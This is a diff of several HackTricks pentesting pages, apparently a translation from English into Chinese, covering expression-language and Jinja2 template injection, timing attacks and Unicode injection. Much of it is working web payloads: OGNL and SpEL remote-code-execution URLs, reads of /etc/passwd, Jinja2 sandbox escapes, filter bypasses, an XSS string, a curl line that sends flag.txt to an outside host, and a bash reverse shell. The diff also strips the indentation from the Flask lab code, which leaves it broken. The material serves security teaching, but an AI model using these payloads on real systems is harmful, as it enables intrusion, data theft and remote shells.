@@ -102,46 +95,34 @@ Check it in **this post:** [**https://xvnpw.medium.com/hacking-spel-part-1-d2ff2
 {"".getClass().forName("java.util.Date").getMethods()[0].toString()}
 [public boolean java.util.Date.equals(java.lang.Object)]
 ```
+### 检测
 
-### Detection
-
-- Burp detection
-
+- Burp 检测
 ```bash
 gk6q${"zkz".toString().replace("k", "x")}doap2
 #The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
 ```
-
-- J2EE detection
-
+- J2EE 检测
 ```bash
 #J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):
 https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
 ```
-
-- Sleep 10 secs
-
+- 睡眠 10 秒
 ```bash
 #Blind detection vector (sleep during 10 seconds)
 https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
 ```
-
-### Remote File Inclusion
-
+### 远程文件包含
 ```bash
 https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
 ```
-
-### Directory Listing
-
+### 目录列表
 ```bash
 https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
 ```
-
 ### RCE
 
-- Basic RCE **explanation**
-
+- 基本 RCE **解释**
 ```bash
 #Check the method getRuntime is there
 {"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
@@ -157,21 +138,15 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
 # With HTMl entities injection inside the template
 <a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
 ```
-
 - RCE **linux**
-
 ```bash
 https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
 ```
-
-- RCE **Windows** (not tested)
-
+- RCE **Windows**（未测试）
 ```bash
 https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
 ```
-
-- **More RCE**
-
+- **更多 RCE**
 ```java
 // Common RCE payloads
 ''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
@@ -207,40 +182,33 @@ T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
 T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
 ''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
 ```
+### 检查环境
 
-### Inspecting the environment
-
-- `applicationScope` - global application variables
-- `requestScope` - request variables
-- `initParam` - application initialization variables
-- `sessionScope` - session variables
-- `param.X` - param value where X is the name of a http parameter
-
-You will need to cast this variables to String like:
+- `applicationScope` - 全局应用变量
+- `requestScope` - 请求变量
+- `initParam` - 应用初始化变量
+- `sessionScope` - 会话变量
+- `param.X` - 参数值，其中 X 是 http 参数的名称
 
+您需要将这些变量转换为字符串，例如：
 ```bash
 ${sessionScope.toString()}
 ```
-
-#### Authorization bypass example
-
+#### 授权绕过示例
 ```bash
 ${pageContext.request.getSession().setAttribute("admin", true)}
 ```
-
-The application can also use custom variables like:
-
+该应用程序还可以使用自定义变量，例如：
 ```bash
 ${user}
 ${password}
 ${employee.FirstName}
 ```
+## WAF 绕过
 
-## WAF Bypass
+查看 [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
 
-Check [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
-
-## References
+## 参考文献
 
 - [https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/](https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/)
 - [https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
@@ -248,4 +216,3 @@ Check [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pm
 - [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
index 8212ed7bf..284ce43f3 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
@@ -4,12 +4,11 @@
 
 <figure><img src="../../images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
-## **Lab**
-
+## **实验室**
 ```python
 from flask import Flask, request, render_template_string
 
@@ -17,21 +16,19 @@ app = Flask(__name__)
 
 @app.route("/")
 def home():
-    if request.args.get('c'):
-        return render_template_string(request.args.get('c'))
-    else:
-        return "Hello, send someting inside the param 'c'!"
+if request.args.get('c'):
+return render_template_string(request.args.get('c'))
+else:
+return "Hello, send someting inside the param 'c'!"
 
 if __name__ == "__main__":
-    app.run()
+app.run()
 ```
+## **杂项**
 
-## **Misc**
-
-### **Debug Statement**
-
-If the Debug Extension is enabled, a `debug` tag will be available to dump the current context as well as the available filters and tests. This is useful to see what’s available to use in the template without setting up a debugger.
+### **调试语句**
 
+如果启用了调试扩展，将会有一个 `debug` 标签可用于转储当前上下文以及可用的过滤器和测试。这对于查看在模板中可以使用的内容而无需设置调试器非常有用。
 ```python
 <pre>
 
@@ -48,19 +45,15 @@ If the Debug Extension is enabled, a `debug` tag will be available to dump the c
 
 </pre>
 ```
-
-Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement](https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement)
-
-### **Dump all config variables**
-
+### **转储所有配置变量**
 ```python
 {{ config }} #In these object you can find all the configured env variables
 
 
 {% raw %}
 {% for key, value in config.items() %}
-    <dt>{{ key|e }}</dt>
-    <dd>{{ value|e }}</dd>
+<dt>{{ key|e }}</dt>
+<dd>{{ value|e }}</dd>
 {% endfor %}
 {% endraw %}
 
@@ -70,16 +63,14 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
 
 
 ```
+## **Jinja 注入**
 
-## **Jinja Injection**
+首先，在 Jinja 注入中，您需要 **找到一种方法从沙箱中逃脱** 并恢复访问常规的 Python 执行流程。为此，您需要 **滥用对象**，这些对象 **来自** **非沙箱环境但可以从沙箱中访问**。
 
-First of all, in a Jinja injection you need to **find a way to escape from the sandbox** and recover access the regular python execution flow. To do so, you need to **abuse objects** that are **from** the **non-sandboxed environment but are accessible from the sandbox**.
-
-### Accessing Global Objects
-
-For example, in the code `render_template("hello.html", username=username, email=email)` the objects username and email **come from the non-sanboxed python env** and will be **accessible** inside the **sandboxed env.**\
-Moreover, there are other objects that will be **always accessible from the sandboxed env**, these are:
+### 访问全局对象
 
+例如，在代码 `render_template("hello.html", username=username, email=email)` 中，对象 username 和 email **来自非沙箱的 Python 环境**，并且在 **沙箱环境** 内是 **可访问的**。\
+此外，还有其他对象将 **始终可以从沙箱环境访问**，这些对象包括：
 ```
 []
 ''
@@ -88,15 +79,13 @@ dict
 config
 request
 ```
+### 恢复 \<class 'object'>
 
-### Recovering \<class 'object'>
+然后，从这些对象中我们需要到达类：**`<class 'object'>`** 以尝试 **恢复** 定义的 **类**。这是因为从这个对象我们可以调用 **`__subclasses__`** 方法并 **访问所有非沙箱** 的 python 环境中的类。
 
-Then, from these objects we need to get to the class: **`<class 'object'>`** in order to try to **recover** defined **classes**. This is because from this object we can call the **`__subclasses__`** method and **access all the classes from the non-sandboxed** python env.
-
-In order to access that **object class**, you need to **access a class object** and then access either **`__base__`**, **`__mro__()[-1]`** or `.`**`mro()[-1]`**. And then, **after** reaching this **object class** we **call** **`__subclasses__()`**.
-
-Check these examples:
+为了访问该 **对象类**，您需要 **访问一个类对象**，然后访问 **`__base__`**、**`__mro__()[-1]`** 或 **`.`**`mro()[-1]`**。然后，在到达这个 **对象类** 之后，我们 **调用** **`__subclasses__()`**。
 
+查看这些示例：
 ```python
 # To access a class object
 [].__class__
@@ -140,23 +129,19 @@ dict.__mro__[-1]
 {{ [].class.base.subclasses() }}
 {{ ''.class.mro()[1].subclasses() }}
 ```
-
 ### RCE Escaping
 
-**Having recovered** `<class 'object'>` and called `__subclasses__` we can now use those classes to read and write files and exec code.
+**恢复了** `<class 'object'>` 并调用了 `__subclasses__`，我们现在可以使用这些类来读取和写入文件以及执行代码。
 
-The call to `__subclasses__` has given us the opportunity to **access hundreds of new functions**, we will be happy just by accessing the **file class** to **read/write files** or any class with access to a class that **allows to execute commands** (like `os`).
-
-**Read/Write remote file**
+对 `__subclasses__` 的调用给了我们机会 **访问数百个新函数**，我们只需访问 **文件类** 来 **读取/写入文件** 或任何可以访问 **允许执行命令** 的类（如 `os`）。
 
+**读取/写入远程文件**
 ```python
 # ''.__class__.__mro__[1].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
 {{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
 ```
-
 **RCE**
-
 ```python
 # The class 396 is the class <class 'subprocess.Popen'>
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
@@ -179,20 +164,18 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o
 {{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }}
 
 ```
-
-To learn about **more classes** that you can use to **escape** you can **check**:
+要了解您可以用来**逃避**的**更多类**，您可以**查看**：
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
 {{#endref}}
 
-### Filter bypasses
+### 过滤器绕过
 
-#### Common bypasses
-
-These bypass will allow us to **access** the **attributes** of the objects **without using some chars**.\
-We have already seen some of these bypasses in the examples of the previous, but let sumarize them here:
+#### 常见绕过
 
+这些绕过将允许我们**访问**对象的**属性**，**而不使用某些字符**。\
+我们已经在之前的示例中看到了一些这些绕过，但在这里总结一下：
 ```bash
 # Without quotes, _, [, ]
 ## Basic ones
@@ -224,31 +207,25 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
 
 
 ```
+- [**返回这里以获取更多访问全局对象的选项**](jinja2-ssti.md#accessing-global-objects)
+- [**返回这里以获取更多访问对象类的选项**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
+- [**阅读此内容以在没有对象类的情况下获取RCE**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
 
-- [**Return here for more options to access a global object**](jinja2-ssti.md#accessing-global-objects)
-- [**Return here for more options to access the object class**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
-- [**Read this to get RCE without the object class**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
-
-**Avoiding HTML encoding**
-
-By default Flask HTML encode all the inside a template for security reasons:
+**避免HTML编码**
 
+默认情况下，Flask出于安全原因对模板中的所有内容进行HTML编码：
 ```python
 {{'<script>alert(1);</script>'}}
 #will be
 &lt;script&gt;alert(1);&lt;/script&gt;
 ```
-
-**The `safe`** filter allows us to inject JavaScript and HTML into the page **without** it being **HTML encoded**, like this:
-
+**`safe`** 过滤器允许我们将 JavaScript 和 HTML 注入到页面中 **而不** 进行 **HTML 编码**，如下所示：
 ```python
 {{'<script>alert(1);</script>'|safe}}
 #will be
 <script>alert(1);</script>
 ```
-
-**RCE by writing an evil config file.**
-
+**通过编写恶意配置文件进行 RCE。**
 ```python
 # evil config
 {{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
@@ -259,11 +236,9 @@ By default Flask HTML encode all the inside a template for security reasons:
 # connect to evil host
 {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
 ```
+## 没有几个字符
 
-## Without several chars
-
-Without **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
-
+没有 **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
 ```python
 {% raw %}
 {%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
@@ -275,14 +250,12 @@ Without **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
 
 
 ```
+## Jinja 注入而不使用 **\<class 'object'>**
 
-## Jinja Injection without **\<class 'object'>**
-
-From the [**global objects**](jinja2-ssti.md#accessing-global-objects) there is another way to get to **RCE without using that class.**\
-If you manage to get to any **function** from those globals objects, you will be able to access **`__globals__.__builtins__`** and from there the **RCE** is very **simple**.
-
-You can **find functions** from the objects **`request`**, **`config`** and any **other** interesting **global object** you have access to with:
+从 [**全局对象**](jinja2-ssti.md#accessing-global-objects) 有另一种方法可以到达 **RCE 而不使用该类。**\
+如果你设法从这些全局对象中获取到任何 **函数**，你将能够访问 **`__globals__.__builtins__`**，从那里 **RCE** 是非常 **简单** 的。
 
+你可以通过以下方式从对象 **`request`**、**`config`** 和任何 **其他** 有访问权限的 **全局对象** 中 **找到函数**：
 ```bash
 {{ request.__class__.__dict__ }}
 - application
@@ -302,9 +275,7 @@ You can **find functions** from the objects **`request`**, **`config`** and any
 
 # You can iterate through children objects to find more
 ```
-
-Once you have found some functions you can recover the builtins with:
-
+一旦你找到了一些函数，你可以通过以下方式恢复内置函数：
 ```python
 # Read file
 {{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
@@ -326,13 +297,9 @@ Once you have found some functions you can recover the builtins with:
 
 # All the bypasses seen in the previous sections are also valid
 ```
-
 ### Fuzzing WAF bypass
 
-**Fenjing** [https://github.com/Marven11/Fenjing](https://github.com/Marven11/Fenjing) is a tool that its specialized on CTFs but can be also useful to bruteforce invalid params on a real scenario. The tool just spray words and queries to detect filters, searching for bypasses, and also provide a interactive console.
-
-English-Chinese Google translation
-
+**Fenjing** [https://github.com/Marven11/Fenjing](https://github.com/Marven11/Fenjing) 是一个专门用于CTF的工具，但在真实场景中也可以用于暴力破解无效参数。该工具仅仅是喷洒单词和查询以检测过滤器，寻找绕过方法，并提供一个交互式控制台。
 ```
 webui:
 As the name suggests, web UI
@@ -357,13 +324,11 @@ crack-request: Read a request file for attack
 Read the request in the file, PAYLOADreplace it with the actual payload and submit it
 The request will be urlencoded by default according to the HTTP format, which can be --urlencode-payload 0turned off.
 ```
-
-## References
+## 参考文献
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
-- Check [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
+- 查看 [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
 - [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
 - [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/timing-attacks.md b/src/pentesting-web/timing-attacks.md
index d320181bd..360eabaa6 100644
--- a/src/pentesting-web/timing-attacks.md
+++ b/src/pentesting-web/timing-attacks.md
@@ -3,38 +3,37 @@
 {{#include ../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> For obtaining a deep understanding of this technique check the original report from [https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)
+> 要深入了解此技术，请查看原始报告 [https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)
 
 ## Basic Information
 
-The basic goal of a timing attack is basically to be able to answer complicated questions or detect hidden functionalities by just **checking the time differences in the responses from similar requests**.
+时序攻击的基本目标是通过**检查相似请求的响应时间差异**来回答复杂问题或检测隐藏功能。
 
-Traditionally this has been very complicated because the latency an jitter introduced by both the network and the server. However, since the discovery and improvement of the [**Race Condition Single Packet attack**](race-condition.md#http-2-single-packet-attack-vs.-http-1.1-last-byte-synchronization), it's possible to use this technique to remove all network delays noised from the equation.\
-Leaving only the **server delays** make timing attack easier to discover and abuse.
+传统上，由于网络和服务器引入的延迟和抖动，这一直非常复杂。然而，自从发现和改进了[**竞争条件单包攻击**](race-condition.md#http-2-single-packet-attack-vs.-http-1.1-last-byte-synchronization)后，可以使用此技术将所有网络延迟噪声从方程中去除。\
+只留下**服务器延迟**使得时序攻击更容易被发现和利用。
 
 ## Discoveries
 
 ### Hidden Attack Surface
 
-In the blog post is commented how using this technique it was possible to find hidden parameters and even headers just checking that whenever the param or header was present in the request there was a **time difference of about 5ms**. Actually, this discovery technique has been adde to **Param Miner** in Burp Suite.
+在博客文章中提到，使用此技术可以找到隐藏参数甚至头部，只需检查每当参数或头部在请求中存在时，**时间差约为5毫秒**。实际上，这种发现技术已被添加到Burp Suite的**Param Miner**中。
 
-These time differences might because a **DNS request** was performed, some **log was written** because an invalid input or because some **checks are performed** when a parameter is present int he request.
+这些时间差可能是因为**DNS请求**被执行，某些**日志被写入**因为无效输入，或者因为在请求中存在参数时执行了一些**检查**。
 
-Something you need to remember when performing this kind of attacks is that because of the hidden nature of the surface, you might not know what is the actual real cause of the time differences.
+在执行这种攻击时需要记住的一点是，由于表面的隐藏性质，您可能不知道时间差的实际原因是什么。
 
 ### Reverse Proxy Misconfigurations
 
-In the same research, it was shared that the timing technique was great to discover "scoped SSRFs" (which are SSRFs that can only access to allowed IP/domains). Just **checking the time difference when an allowed domain is set** versus when a not allowed domain is set helps to discover open proxies even if the response is the same.
+在同一研究中，分享了时序技术非常适合发现“范围内的SSRF”（只能访问允许的IP/域的SSRF）。只需**检查设置允许域时的时间差**与设置不允许域时的时间差，有助于发现开放代理，即使响应相同。
 
-Once an scoped open proxy is discovered, it was possible to find valid targets by parsing known subdomains of the target and this allowed to:
+一旦发现范围内的开放代理，就可以通过解析目标的已知子域找到有效目标，这使得：
 
-- **Bypass firewalls** by accessing restricted subdomains via the **open proxy** instead of through internet
-  - Moreover, abusing an **open proxy** it's also possible to **discover new subdomains only accessible internally.**
-- **Front-End impersonation attacks**: Front-end servers normally add headers for the backend like `X-Forwarded-For` or `X-Real-IP`. Open proxies that receives these headers will add them to the requested endpoint, therefore, an attacker could be able to access even more internal domains by adding these headers will whitelisted values.
+- **绕过防火墙**，通过**开放代理**访问受限子域，而不是通过互联网
+- 此外，利用**开放代理**，还可以**发现仅在内部可访问的新子域。**
+- **前端冒充攻击**：前端服务器通常会为后端添加头部，如`X-Forwarded-For`或`X-Real-IP`。接收这些头部的开放代理将其添加到请求的端点，因此，攻击者可以通过添加这些头部与白名单值来访问更多内部域。
 
 ## References
 
 - [https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md
index 80b0a24cd..c38ffe08b 100644
--- a/src/pentesting-web/unicode-injection/README.md
+++ b/src/pentesting-web/unicode-injection/README.md
@@ -2,37 +2,36 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-Depending on how the back-end/front-end is behaving when it **receives weird unicode characters** an attacker might be able to **bypass protections and inject arbitrary characters** that could be used to **abused injection vulnerabilities** such as XSS or SQLi.
+根据后端/前端在**接收奇怪的unicode字符**时的行为，攻击者可能能够**绕过保护并注入任意字符**，这些字符可能被用于**利用注入漏洞**，例如XSS或SQLi。
 
-## Unicode Normalization
+## Unicode规范化
 
-Unicode normalization occurs when **unicode characters are normalized to ascii characters**.
+Unicode规范化发生在**unicode字符被规范化为ascii字符**时。
 
-One common scenario of this type of vulnerability occurs when the system is **modifying** somehow the **input** of the user **after having checked it**. For example, in some languages a simple call to make the **input uppercase or lowercase** could normalize the given input and the **unicode will be transformed into ASCII** generating new characters.\
-For more info check:
+这种类型漏洞的一个常见场景发生在系统**在检查用户的输入后以某种方式修改**该输入。例如，在某些语言中，简单地调用将**输入转换为大写或小写**可能会规范化给定的输入，**unicode将被转换为ASCII**，生成新字符。\
+有关更多信息，请查看：
 
 {{#ref}}
 unicode-normalization.md
 {{#endref}}
 
-## `\u` to `%`
+## `\u` 到 `%`
 
-Unicode characters are usually represented with the **`\u` prefix**. For example the char `㱋` is `\u3c4b`([check it here](https://unicode-explorer.com/c/3c4B)). If a backend **transforms** the prefix **`\u` in `%`**, the resulting string will be `%3c4b`, which URL decoded is: **`<4b`**. And, as you can see, a **`<` char is injected**.\
-You could use this technique to **inject any kind of char** if the backend is vulnerable.\
-Check [https://unicode-explorer.com/](https://unicode-explorer.com/) to find the chars you need.
+Unicode字符通常用**`\u`前缀**表示。例如字符`㱋`是`\u3c4b`（[在这里查看](https://unicode-explorer.com/c/3c4B)）。如果后端**将**前缀**`\u`转换为`%`，则结果字符串将是`%3c4b`，URL解码后为：**`<4b`**。正如你所看到的，**`<`字符被注入**。\
+如果后端存在漏洞，你可以使用此技术**注入任何类型的字符**。\
+查看[https://unicode-explorer.com/](https://unicode-explorer.com/)以找到你需要的字符。
 
-This vuln actually comes from a vulnerability a researcher found, for a more in depth explanation check [https://www.youtube.com/watch?v=aUsAHb0E7Cg](https://www.youtube.com/watch?v=aUsAHb0E7Cg)
+这个漏洞实际上来自一位研究人员发现的漏洞，想要更深入的解释请查看[https://www.youtube.com/watch?v=aUsAHb0E7Cg](https://www.youtube.com/watch?v=aUsAHb0E7Cg)
 
-## Emoji Injection
+## Emoji注入
 
-Back-ends something behaves weirdly when they **receives emojis**. That's what happened in [**this writeup**](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209) where the researcher managed to achieve a XSS with a payload such as: `💋img src=x onerror=alert(document.domain)//💛`
-
-In this case, the error was that the server after removing the malicious characters **converted the UTF-8 string from Windows-1252 to UTF-8** (basically the input encoding and the convert from encoding mismatched). Then this does not give a proper < just a weird unicode one: `‹`\
-``So they took this output and **converted again now from UTF-8 ot ASCII**. This **normalized** the `‹`to`<` this is how the exploit could work on that system.\
-This is what happened:
+后端在**接收表情符号**时表现得有些奇怪。这就是在[**这篇文章**](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209)中发生的情况，研究人员成功地通过一个有效载荷实现了XSS，例如：`💋img src=x onerror=alert(document.domain)//💛`
 
+在这种情况下，错误在于服务器在删除恶意字符后**将UTF-8字符串从Windows-1252转换为UTF-8**（基本上输入编码和转换编码不匹配）。然后这并没有给出一个正确的<，而只是一个奇怪的unicode字符：`‹`\
+``所以他们将这个输出**再次从UTF-8转换为ASCII**。这**规范化**了`‹`为`<`，这就是该系统上漏洞能够工作的方式。\
+发生的事情是：
 ```php
 <?php
 
@@ -43,11 +42,9 @@ $str = iconv("UTF-8", "ASCII//TRANSLIT", $str);
 
 echo "String: " . $str;
 ```
-
-Emoji lists:
+Emoji 列表：
 
 - [https://github.com/iorch/jakaton_feminicidios/blob/master/data/emojis.csv](https://github.com/iorch/jakaton_feminicidios/blob/master/data/emojis.csv)
 - [https://unicode.org/emoji/charts-14.0/full-emoji-list.html](https://unicode.org/emoji/charts-14.0/full-emoji-list.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md
index a12e863ef..b2cce5f2d 100644
--- a/src/pentesting-web/unicode-injection/unicode-normalization.md
+++ b/src/pentesting-web/unicode-injection/unicode-normalization.md
@@ -2,54 +2,52 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there).
+**这是一个总结:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). 查看以获取更多详细信息（图像来自那里）。
 
-## Understanding Unicode and Normalization
+## 理解 Unicode 和规范化
 
-Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing. The Unicode standard defines two types of character equivalence:
+Unicode 规范化是一个确保字符的不同二进制表示标准化为相同二进制值的过程。这个过程在编程和数据处理中的字符串处理至关重要。Unicode 标准定义了两种字符等价性：
 
-1. **Canonical Equivalence**: Characters are considered canonically equivalent if they have the same appearance and meaning when printed or displayed.
-2. **Compatibility Equivalence**: A weaker form of equivalence where characters may represent the same abstract character but can be displayed differently.
+1. **规范等价性**：如果字符在打印或显示时具有相同的外观和含义，则认为它们是规范等价的。
+2. **兼容等价性**：一种较弱的等价形式，其中字符可能表示相同的抽象字符，但可以以不同的方式显示。
 
-There are **four Unicode normalization algorithms**: NFC, NFD, NFKC, and NFKD. Each algorithm employs canonical and compatibility normalization techniques differently. For a more in-depth understanding, you can explore these techniques on [Unicode.org](https://unicode.org/).
+有 **四种 Unicode 规范化算法**：NFC、NFD、NFKC 和 NFKD。每种算法以不同的方式采用规范和兼容性规范化技术。要深入了解，可以在 [Unicode.org](https://unicode.org/) 上探索这些技术。
 
-### Key Points on Unicode Encoding
+### 关于 Unicode 编码的关键点
 
-Understanding Unicode encoding is pivotal, especially when dealing with interoperability issues among different systems or languages. Here are the main points:
+理解 Unicode 编码至关重要，特别是在处理不同系统或语言之间的互操作性问题时。以下是主要要点：
 
-- **Code Points and Characters**: In Unicode, each character or symbol is assigned a numerical value known as a "code point".
-- **Bytes Representation**: The code point (or character) is represented by one or more bytes in memory. For instance, LATIN-1 characters (common in English-speaking countries) are represented using one byte. However, languages with a larger set of characters need more bytes for representation.
-- **Encoding**: This term refers to how characters are transformed into a series of bytes. UTF-8 is a prevalent encoding standard where ASCII characters are represented using one byte, and up to four bytes for other characters.
-- **Processing Data**: Systems processing data must be aware of the encoding used to correctly convert the byte stream into characters.
-- **Variants of UTF**: Besides UTF-8, there are other encoding standards like UTF-16 (using a minimum of 2 bytes, up to 4) and UTF-32 (using 4 bytes for all characters).
+- **代码点和字符**：在 Unicode 中，每个字符或符号都被分配一个称为“代码点”的数值。
